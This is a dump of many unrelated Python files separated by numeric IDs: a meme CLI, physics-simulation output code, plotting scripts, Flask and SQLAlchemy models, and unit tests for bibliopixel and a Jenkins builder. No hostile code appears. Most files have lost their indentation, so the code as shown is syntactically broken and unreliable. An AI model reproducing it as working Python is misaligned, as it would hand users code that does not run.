142309
|
from enum import Enum
from os import (getcwd, path as osp)
import sys
import click
import cv2
from .conf import (get_config, print_config)
from .detect.opencv import HaarCascadeDetector
from .meme.basic import Meme
from .meme.thug import ThugMeme
MEME_RESULT_DIR = getcwd()
CONTEXT = dict(help_option_names=['-h', '--help'])
class Detector(Enum):
OPEN_CV = 'opencv'
DLIB = 'dlib'
_common_decorators = [
click.version_option(None, '-v', '--version'),
click.argument('fpath', type=click.Path(exists=True)),
click.argument('txt1'),
click.argument('txt2'),
click.option(
'--override',
'-o',
type=(str, str),
multiple=True,
help='Override any configuration option: <option_name> <new_value>.'),
click.option(
'--show-config',
is_flag=True,
help='Show the configuration and exit. Takes into account -o options.')
]
def add_decorators(decorators):
def _add_decorators(func):
for decorator in reversed(decorators):
func = decorator(func)
return func
return _add_decorators
def _load_configuration(override, show_and_exit):
conf = get_config(overrides=override)
if show_and_exit:
print_config(conf)
sys.exit(0)
return conf
def _form_result_path(orig_path, result_dir, fname_extra=''):
fname = osp.basename(orig_path)
base, extension = osp.splitext(fname)
fname = '{}{}{}'.format(base, fname_extra, extension)
return osp.join(result_dir, fname)
@click.command(context_settings=CONTEXT)
@add_decorators(_common_decorators)
def meme(fpath, txt1, txt2, override, show_config):
"""Generate a normal meme."""
conf = _load_configuration(override, show_config)
res_path = _form_result_path(
orig_path=osp.abspath(fpath),
result_dir=MEME_RESULT_DIR,
fname_extra=conf['meme']['meme_result_name_add'])
meme = Meme(config=conf['meme'], img_path=fpath, txt1=txt1, txt2=txt2)
meme.create(res_file=res_path)
@click.command(context_settings=CONTEXT)
@add_decorators(_common_decorators)
@click.option(
'--debug',
is_flag=True,
help='Show debug information (e.g. the detection results img)')
@click.option(
'--detector',
type=click.Choice([Detector.OPEN_CV.value, Detector.DLIB.value]),
default=Detector.OPEN_CV.value,
help='Detector to use for finding faces and landmarks.')
def thug_meme(fpath, txt1, txt2, override, show_config, debug, detector):
"""Generate an awesome thug meme."""
fpath = osp.abspath(fpath)
conf = _load_configuration(override, show_config)
res_path = _form_result_path(
orig_path=fpath,
result_dir=MEME_RESULT_DIR,
fname_extra=conf['meme']['thug_result_name_add'])
if detector == Detector.OPEN_CV.value:
detector = HaarCascadeDetector(config=conf['detect'])
elif detector == Detector.DLIB.value:
from .detect.dlib import DlibDetector
detector = DlibDetector(config=conf['detect'])
thugs = detector.find_thug_landmarks(
img_path=osp.abspath(fpath), show_result=debug)
meme = ThugMeme(
config=conf['meme'],
thug_landmarks=thugs,
img_path=fpath,
txt1=txt1,
txt2=txt2)
meme.create(res_path)
if debug:
cv2.waitKey(0)
cv2.destroyAllWindows()
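# --- Usage sketch (illustration only, not part of the original module) ---
# A minimal way to exercise the `meme` command programmatically via click's
# test runner; 'photo.jpg' and the caption texts below are hypothetical, and
# the image file must exist because of the click.Path(exists=True) argument.
if __name__ == '__main__':
    from click.testing import CliRunner

    runner = CliRunner()
    result = runner.invoke(meme, ['photo.jpg', 'TOP TEXT', 'BOTTOM TEXT'])
    print(result.exit_code, result.output)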
|
142335
|
import sys
log_file_path = sys.argv[1]
with open(log_file_path) as f:
lines = f.readlines()
for line in lines:
# Ignore errors from CPU instruction-set or symbol-existence checks
keywords = ['src.c', 'CheckSymbolExists.c']
if all(keyword not in line for keyword in keywords):
print(line, end='')
|
142342
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
from KratosMultiphysics.json_utilities import read_external_json, write_external_json
# Importing the base class
from KratosMultiphysics.json_output_process import JsonOutputProcess
def Factory(settings, Model):
if(type(settings) != KratosMultiphysics.Parameters):
raise Exception("Expected input shall be a Parameters object, encapsulating a json string")
return ParticleJsonOutputProcess(Model, settings["Parameters"])
# All the Python processes should be derived from "Process"
class ParticleJsonOutputProcess(JsonOutputProcess):
def ExecuteBeforeSolutionLoop(self):
data = {}
data["TIME"] = []
count = 0
# Material points values
for mp in self.sub_model_part.Elements:
compute = self.__check_flag(mp)
if (compute == True):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)] = {}
else:
data["RESULTANT"] = {}
for i in range(self.params["gauss_points_output_variables"].size()):
out = self.params["gauss_points_output_variables"][i]
variable_name = out.GetString()
variable_type = KratosMultiphysics.KratosGlobals.GetVariableType(variable_name)
if (variable_type == "Double" or variable_type == "Integer" or variable_type == "Component"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
elif variable_type == "Array":
if (KratosMultiphysics.KratosGlobals.GetVariableType(variable_name + "_X") == "Double"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name + "_X"] = []
data["PARTICLE_" + str(mp.Id)][variable_name + "_Y"] = []
data["PARTICLE_" + str(mp.Id)][variable_name + "_Z"] = []
else:
if (count == 0):
data["RESULTANT"][variable_name + "_X"] = []
data["RESULTANT"][variable_name + "_Y"] = []
data["RESULTANT"][variable_name + "_Z"] = []
else:
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
elif variable_type == "Vector":
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
count += 1
write_external_json(self.output_file_name, data)
def ExecuteFinalizeSolutionStep(self):
data = read_external_json(self.output_file_name)
time = self.sub_model_part.ProcessInfo.GetValue(KratosMultiphysics.TIME)
dt = self.sub_model_part.ProcessInfo.GetValue(KratosMultiphysics.DELTA_TIME)
self.time_counter += dt
if self.time_counter > self.frequency:
self.time_counter = 0.0
data["TIME"].append(time)
count = 0
# Material points values
for mp in self.sub_model_part.Elements:
compute = self.__check_flag(mp)
if (compute == True):
for i in range(self.params["gauss_points_output_variables"].size()):
out = self.params["gauss_points_output_variables"][i]
variable_name = out.GetString()
variable = KratosMultiphysics.KratosGlobals.GetVariable(variable_name)
variable_type = KratosMultiphysics.KratosGlobals.GetVariableType(variable_name)
values_vector = mp.CalculateOnIntegrationPoints(variable, self.sub_model_part.ProcessInfo)
value = values_vector[0]
if (variable_type == "Double" or variable_type == "Integer" or variable_type == "Component"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name].append(value)
else:
if (count == 0):
data["RESULTANT"][variable_name].append(value)
else:
data["RESULTANT"][variable_name][-1] += value
elif variable_type == "Array":
if (KratosMultiphysics.KratosGlobals.GetVariableType(variable_name + "_X") == "Double"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name + "_X"].append(value[0])
data["PARTICLE_" + str(mp.Id)][variable_name + "_Y"].append(value[1])
data["PARTICLE_" + str(mp.Id)][variable_name + "_Z"].append(value[2])
else:
if (count == 0):
data["RESULTANT"][variable_name + "_X"].append(value[0])
data["RESULTANT"][variable_name + "_Y"].append(value[1])
data["RESULTANT"][variable_name + "_Z"].append(value[2])
else:
data["RESULTANT"][variable_name + "_X"][-1] += value[0]
data["RESULTANT"][variable_name + "_Y"][-1] += value[1]
data["RESULTANT"][variable_name + "_Z"][-1] += value[2]
else:
if (self.resultant_solution == False):
values_list = self.__kratos_vector_to__python_list(value)
data["PARTICLE_" + str(mp.Id)][variable_name].append(values_list)
else:
aux = 0.0
for index in range(len(value)):
aux += value[index]
if (count == 0):
data["RESULTANT"][variable_name ].append(aux)
else:
data["RESULTANT"][variable_name ][-1] += aux
elif variable_type == "Vector":
if (self.resultant_solution == False):
values_list = self.__kratos_vector_to__python_list(value)
data["PARTICLE_" + str(mp.Id)][variable_name].append(values_list)
else:
if (count == 0):
values_list = self.__kratos_vector_to__python_list(value)
data["RESULTANT"][variable_name][-1] += values_list
count += 1
write_external_json(self.output_file_name, data)
def __kratos_vector_to__python_list(self, value):
values_list = []
for index in range(len(value)):
values_list.append(value[index])
return values_list
def __check_flag(self, component):
if self.flag != None:
if component.Is(self.flag) == False:
return False
return True
|
142377
|
import os
import matplotlib as mpl
mpl.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
from getdist import plots
roots = ["mcmc"]
params = ["beta", "alpha100", "alpha143", "alpha217", "alpha353"]
g = plots.get_subplot_plotter(
chain_dir=os.path.join(os.getcwd(), "chains"),
analysis_settings={"ignore_rows": 0.3},
)
kwargs = dict(colors=["k"], lws=[1])
g.triangle_plot(roots, params, **kwargs, diag1d_kwargs=kwargs)
# Show Minami & Komatsu results https://arxiv.org/abs/2011.11254
eb_results = {
"beta": {"mean": 0.35, "std": 0.14},
"alpha100": {"mean": -0.28, "std": 0.13},
"alpha143": {"mean": +0.07, "std": 0.12},
"alpha217": {"mean": -0.07, "std": 0.11},
"alpha353": {"mean": -0.09, "std": 0.11},
}
from scipy.stats import norm
for i, param in enumerate(params):
ax = g.subplots[i, i]
xmin, xmax, ymin, ymax = ax.axis()
x = np.linspace(xmin, xmax, 100)
posterior = norm.pdf(x, eb_results[param]["mean"], eb_results[param]["std"])
ax.plot(x, posterior / np.max(posterior), color="tab:red")
# Fake legend
g.subplots[0, 0].plot([], [], color="tab:red", label="Minami & Komatsu")
g.subplots[0, 0].plot([], [], color="k", label="PSpipe")
g.subplots[0, 0].legend(loc="upper left", bbox_to_anchor=(1, 1))
# Add table on figure
table_results = r"""
\begin{tabular} { l c}
Parameter & 68\% limits\\
\hline
{\boldmath$\alpha_{100} $} & $-0.28\pm0.13 $\\
{\boldmath$\alpha_{143} $} & $0.07 \pm0.12 $\\
{\boldmath$\alpha_{217} $} & $-0.07\pm0.11 $\\
{\boldmath$\alpha_{353} $} & $-0.09\pm0.11 $\\
{\boldmath$\beta $} & $0.35 \pm0.14 $\\
\hline
\end{tabular}
"""
with mpl.rc_context(rc={"text.usetex": True}):
table = g.sample_analyser.mcsamples[roots[0]].getTable(limit=1, paramList=params)
kwargs = dict(size=15, ha="right")
g.subplots[0, 0].text(5, +0.0, "<NAME>" + table_results.replace("\n", ""), **kwargs)
g.subplots[0, 0].text(5, -1.0, "PSpipe" + table.tableTex().replace("\n", ""), **kwargs)
plt.savefig("EB_plot_chain_results.png")
|
142416
|
import os
from subprocess import run, PIPE
try:
version = os.environ['ELASTIC_VERSION']
except KeyError:
version = run('./bin/elastic-version', stdout=PIPE).stdout.decode().strip()
|
142426
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField
from wtforms.validators import DataRequired
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
captcha = StringField('captcha', validators=[DataRequired()])
submit = SubmitField("Login")
|
142466
|
import _plotly_utils.basevalidators
class SurfaceaxisValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(self, plotly_name="surfaceaxis", parent_name="scatter3d", **kwargs):
super(SurfaceaxisValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
values=kwargs.pop("values", [-1, 0, 1, 2]),
**kwargs
)
|
142490
|
import spacy_streamlit
import typer
def main(models: str, default_text: str):
models = [name.strip() for name in models.split(",")]
spacy_streamlit.visualize(models, default_text, visualizers=["ner"])
if __name__ == "__main__":
try:
typer.run(main)
except SystemExit:
pass
|
142492
|
from sqlobject import *
from sqlobject.tests.dbtest import *
########################################
## Expiring, syncing
########################################
class SyncTest(SQLObject):
name = StringCol(length=50, alternateID=True, dbName='name_col')
def test_expire():
setupClass(SyncTest)
SyncTest(name='bob')
SyncTest(name='tim')
conn = SyncTest._connection
b = SyncTest.byName('bob')
conn.query("UPDATE sync_test SET name_col = 'robert' WHERE id = %i"
% b.id)
assert b.name == 'bob'
b.expire()
assert b.name == 'robert'
conn.query("UPDATE sync_test SET name_col = 'bobby' WHERE id = %i"
% b.id)
b.sync()
assert b.name == 'bobby'
|
142505
|
from .protoconf import (
Protoconf,
ProtoconfSync,
ProtoconfMutation,
ProtoconfMutationSync,
)
|
142533
|
from __future__ import division, absolute_import, print_function
import numpy as np
"""
A script to generate the van der Waals surface of molecules.
"""
# Van der Waals radii (in angstrom) are taken from GAMESS.
vdw_r = {'H': 1.20, 'HE': 1.20,
'LI': 1.37, 'BE': 1.45, 'B': 1.45, 'C': 1.50,
'N': 1.50, 'O': 1.40, 'F': 1.35, 'NE': 1.30,
'NA': 1.57, 'MG': 1.36, 'AL': 1.24, 'SI': 1.17,
'P': 1.80, 'S': 1.75, 'CL': 1.70}
def surface(n):
"""Computes approximately n points on unit sphere. Code adapted from GAMESS.
Parameters
----------
n : int
approximate number of requested surface points
Returns
-------
ndarray
numpy array of xyz coordinates of surface points
"""
u = []
eps = 1e-10
nequat = int(np.sqrt(np.pi*n))
nvert = int(nequat/2)
nu = 0
for i in range(nvert+1):
fi = np.pi*i/nvert
z = np.cos(fi)
xy = np.sin(fi)
nhor = int(nequat*xy+eps)
if nhor < 1:
nhor = 1
for j in range(nhor):
fj = 2*np.pi*j/nhor
x = np.cos(fj)*xy
y = np.sin(fj)*xy
if nu >= n:
return np.array(u)
nu += 1
u.append([x, y, z])
return np.array(u)
def vdw_surface(coordinates, elements, scale_factor, density, input_radii):
"""Computes points outside the van der Waals surface of molecules.
Parameters
----------
coordinates : ndarray
cartesian coordinates of the nuclei, in units of angstrom
elements : list
The symbols (e.g. C, H) for the atoms
scale_factor : float
The points on the molecular surface are set at a distance of
scale_factor * vdw_radius away from each of the atoms.
density : float
The (approximate) number of points to generate per square angstrom
of surface area. 1.0 is the default recommended by Kollman & Singh.
input_radii : dict
dictionary of user's defined VDW radii
Returns
-------
radii : dict
A dictionary of scaled VDW radii
surface_points : ndarray
array of the coordinates of the points on the surface
"""
radii = {}
surface_points = []
# scale radii
for i in elements:
if i in radii.keys():
continue
if i in input_radii.keys():
radii[i] = input_radii[i] * scale_factor
elif i in vdw_r.keys():
radii[i] = vdw_r[i] * scale_factor
else:
raise KeyError('%s is not a supported element; ' % i
+ 'use the "VDW_RADII" option to add '
+ 'its van der Waals radius.')
# loop over atomic coordinates
for i in range(len(coordinates)):
# calculate approximate number of ESP grid points
n_points = int(density * 4.0 * np.pi* np.power(radii[elements[i]], 2))
# generate an array of n_points in a unit sphere around the atom
dots = surface(n_points)
# scale the unit sphere by the VDW radius and translate
dots = coordinates[i] + radii[elements[i]] * dots
for j in range(len(dots)):
save = True
for k in range(len(coordinates)):
if i == k:
continue
# exclude points within the scaled VDW radius of other atoms
d = np.linalg.norm(dots[j] - coordinates[k])
if d < radii[elements[k]]:
save = False
break
if save:
surface_points.append(dots[j])
return np.array(surface_points), radii
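# --- Usage sketch (illustration only, not part of the original module) ---
# Builds an MSK-style point shell around a hypothetical water geometry; the
# coordinates are approximate, given in angstrom, and purely for illustration.
if __name__ == '__main__':
    water_xyz = np.array([
        [0.000, 0.000, 0.117],    # O
        [0.000, 0.757, -0.467],   # H
        [0.000, -0.757, -0.467],  # H
    ])
    points, scaled_radii = vdw_surface(water_xyz, ['O', 'H', 'H'],
                                       scale_factor=1.4, density=1.0,
                                       input_radii={})
    print(points.shape, scaled_radii)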
|
142598
|
import unittest
from bibliopixel.util import offset_range
class OffsetRangeTest(unittest.TestCase):
def test_empty(self):
dmx = offset_range.DMXChannel.make()
self.assertEqual(dmx.index(0), None)
self.assertEqual(dmx.index(1), 0)
self.assertEqual(dmx.index(2), 1)
self.assertEqual(dmx.index(511), 510)
self.assertEqual(dmx.index(512), 511)
self.assertEqual(dmx.index(513), None)
l256 = list(range(256))
r = list(dmx.read_from(l256))
self.assertEqual(r, l256 + ([0] * 256))
target = [23] * 128
dmx.copy_to(l256, target)
self.assertEqual(target, list(range(128)))
def test_empty_copy(self):
dmx = offset_range.DMXChannel.make()
l256 = list(range(256))
r = list(dmx.read_from(l256))
self.assertEqual(r, l256 + ([0] * 256))
target = []
dmx.copy_to(l256, target)
self.assertEqual(target, [])
def test_positive_offset(self):
midi = offset_range.MidiChannel(offset=4)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(1), None)
self.assertEqual(midi.index(4), None)
self.assertEqual(midi.index(5), 0)
self.assertEqual(midi.index(6), 1)
self.assertEqual(midi.index(15), 10)
self.assertEqual(midi.index(16), 11)
self.assertEqual(midi.index(16), 11)
self.assertEqual(midi.index(17), None)
expected = [-1, -1, -1, -1] + list(range(12))
actual = list(midi.read_from(range(16), pad=-1))
self.assertEqual(expected, actual)
target = [100] * 100
midi.copy_to(list(range(16)), target)
expected = list(range(4, 16)) + [100] * 88
self.assertEqual(target, expected)
def test_negative_offset(self):
midi = offset_range.MidiChannel(-4)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(1), 4)
self.assertEqual(midi.index(2), 5)
self.assertEqual(midi.index(12), 15)
self.assertEqual(midi.index(13), None)
actual = list(midi.read_from(range(16), pad=-1))
expected = list(range(4, 16)) + [-1, -1, -1, -1]
self.assertEqual(expected, actual)
target = [100] * 8
midi.copy_to(list(range(16)), target)
expected = [4, 5, 6, 7, 8, 9, 10, 11]
self.assertEqual(target, expected)
def test_begin_end_offset(self):
midi = offset_range.MidiChannel(offset=-5, begin=6, end=8)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(4), None)
self.assertEqual(midi.index(5), None)
self.assertEqual(midi.index(6), 10)
self.assertEqual(midi.index(7), 11)
self.assertEqual(midi.index(8), 12)
self.assertEqual(midi.index(9), None)
self.assertEqual(midi.index(10), None)
actual = list(midi.read_from(range(16)))
expected = [0, 0, 0, 0, 0, 10, 11, 12, 0, 0, 0, 0, 0, 0, 0, 0]
self.assertEqual(expected, actual)
target = [100] * 24
midi.copy_to(list(range(7)), target)
expected = 5 * [100] + [5, 6] + 17 * [100]
self.assertEqual(target, expected)
target = [100] * 24
midi.copy_to(list(range(8)), target)
expected = 5 * [100] + [5, 6, 7] + 16 * [100]
self.assertEqual(target, expected)
target = [100] * 24
midi.copy_to(list(range(9)), target)
expected = 5 * [100] + [5, 6, 7] + 16 * [100]
self.assertEqual(target, expected)
def test_errors(self):
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=0)
offset_range.MidiChannel(begin=1)
offset_range.MidiChannel(begin=16)
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=17)
with self.assertRaises(ValueError):
offset_range.MidiChannel(end=0)
offset_range.MidiChannel(end=1)
offset_range.MidiChannel(end=16)
with self.assertRaises(ValueError):
offset_range.MidiChannel(end=17)
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=2, end=1)
|
142601
|
from . import app
from flask_sqlalchemy import SQLAlchemy
import datetime
import os
# SQLAlchemy setup
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+os.path.join(basedir, '../data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class Software(db.Model):
"""
Entity class for an item of software submitted for assessment
"""
__tablename__ = 'software'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.Text)
description = db.Column(db.Text)
version = db.Column(db.Text)
submitter = db.Column(db.Text)
submitted = db.Column(db.DateTime, default=datetime.datetime.now)
url = db.Column(db.Text)
scores = db.relationship('Score', backref='software', lazy='dynamic')
class Score(db.Model):
"""
Entity class for the result of running a metric against an item of software
"""
__tablename__ = 'score'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
software_id = db.Column(db.Integer, db.ForeignKey('software.id'))
name = db.Column(db.Text)
identifier = db.Column(db.Text)
category = db.Column(db.Text)
short_description = db.Column(db.Text)
long_description = db.Column(db.Text)
interactive = db.Column(db.Boolean)
value = db.Column(db.Integer)
feedback = db.Column(db.Text)
category_importance = db.Column(db.Integer)
metric_importance = db.Column(db.Integer)
updated = db.Column(db.TIMESTAMP, server_default=db.func.now(), onupdate=db.func.current_timestamp())
def __init__(self, software_id, name, identifier, category, short_description, long_description, interactive, value,
feedback, category_importance=1, metric_importance=1):
self.software_id = software_id
self.name = name
self.identifier = identifier
self.category = category
self.short_description = short_description
self.long_description = long_description
self.interactive = interactive
self.value = value
self.feedback = feedback
self.category_importance = category_importance
self.metric_importance = metric_importance
# Create database if required
if not os.path.exists(os.path.join(basedir, '../data.sqlite')):
app.logger.info("Creating tables in ./data.sqlite")
db.create_all()
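# --- Usage sketch (illustration only, not part of the original module) ---
# Within a Flask application context, a submission and one of its scores
# could be persisted roughly like this; all field values are hypothetical.
def _example_submission():
    sw = Software(name='ExampleTool', description='Demo entry', version='0.1',
                  submitter='someone', url='https://example.org')
    db.session.add(sw)
    db.session.commit()
    score = Score(sw.id, 'License present', 'license_check', 'Maintainability',
                  'Checks for a licence file', 'Longer description of the metric.',
                  False, 1, 'Found LICENSE in the repository root')
    db.session.add(score)
    db.session.commit()
    return sw, score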
|
142628
|
def main(name="User", name2="<NAME>"):
print(f"Hello, {name}! I am {name2}!")
if __name__=="__main__":
main()
|
142683
|
from django.test import TestCase
from django.conf import settings
import json
from newt.tests import MyTestClient, newt_base_url, login
class AuthTests(TestCase):
fixtures = ["test_fixture.json"]
def setUp(self):
self.client = MyTestClient()
def test_login(self):
# Should not be logged in
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
# Should be logged in
r = self.client.post(newt_base_url + "/auth", data=login)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
# A logged-in self.client should return user info
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
def test_logout(self):
# Should be logged in
r = self.client.post(newt_base_url + "/auth", data=login)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
r = self.client.delete(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
|
142686
|
from __future__ import absolute_import
import mock
import os.path
import responses
import pytest
import re
import time
from flask import current_app
from uuid import UUID
from changes.config import db, redis
from changes.constants import Status, Result
from changes.lib.artifact_store_lib import ArtifactState
from changes.lib.artifact_store_mock import ArtifactStoreMock
from changes.models.artifact import Artifact
from changes.models.failurereason import FailureReason
from changes.models.filecoverage import FileCoverage
from changes.models.job import Job
from changes.models.log import LogSource
from changes.models.patch import Patch
from changes.models.test import TestCase
from changes.models.testartifact import TestArtifact
from changes.backends.jenkins.builder import JenkinsBuilder, MASTER_BLACKLIST_KEY, JENKINS_LOG_NAME
from changes.testutils import (
BackendTestCase, eager_tasks, SAMPLE_DIFF, SAMPLE_XUNIT, SAMPLE_COVERAGE,
SAMPLE_XUNIT_TESTARTIFACTS
)
class BaseTestCase(BackendTestCase):
builder_cls = JenkinsBuilder
builder_options = {
'master_urls': ['http://jenkins.example.com'],
'diff_urls': ['http://jenkins-diff.example.com'],
'job_name': 'server',
}
def setUp(self):
self.project = self.create_project()
ArtifactStoreMock.reset()
super(BaseTestCase, self).setUp()
def get_builder(self, **options):
base_options = self.builder_options.copy()
base_options.update(options)
return self.builder_cls(app=current_app, **base_options)
def load_fixture(self, filename):
filepath = os.path.join(
os.path.dirname(__file__),
filename,
)
with open(filepath, 'rb') as fp:
return fp.read()
class CreateBuildTest(BaseTestCase):
def test_sets_cluster(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder(cluster='foobar')
with mock.patch.object(builder, 'create_jenkins_build') as create_jenkins_build:
def fake_update(step, **kwargs):
step.data.update({'master': 'fake', 'item_id': '99', 'build_no': None})
return {'queued': True}
create_jenkins_build.side_effect = fake_update
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.cluster == 'foobar'
@responses.activate
def test_queued_creation(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'))
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?depth=1&xpath=/queue/item\\[action/parameter/name=%22CHANGES_BID%22%20and%20action/parameter/value=%22.*?%22\\]/id'),
status=404)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': None,
'item_id': '13',
'job_name': 'server',
'queued': True,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
def test_active_creation(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
@mock.patch.object(JenkinsBuilder, '_find_job')
def test_patch(self, find_job):
responses.add(
responses.POST, 'http://jenkins-diff.example.com/job/server/build',
body='',
status=201)
find_job.return_value = {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins-diff.example.com',
}
patch = Patch(
repository=self.project.repository,
parent_revision_sha='7ebd1f2d750064652ef5bbff72452cc19e1731e0',
diff=SAMPLE_DIFF,
)
db.session.add(patch)
source = self.create_source(self.project, patch=patch)
build = self.create_build(self.project, source=source)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8')
)
builder = self.get_builder()
builder.create_job(job)
@responses.activate
def test_multi_master(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list.json'),
status=200)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
@responses.activate
def test_multi_master_one_bad(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
# This one has a failure status.
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body='',
status=503)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
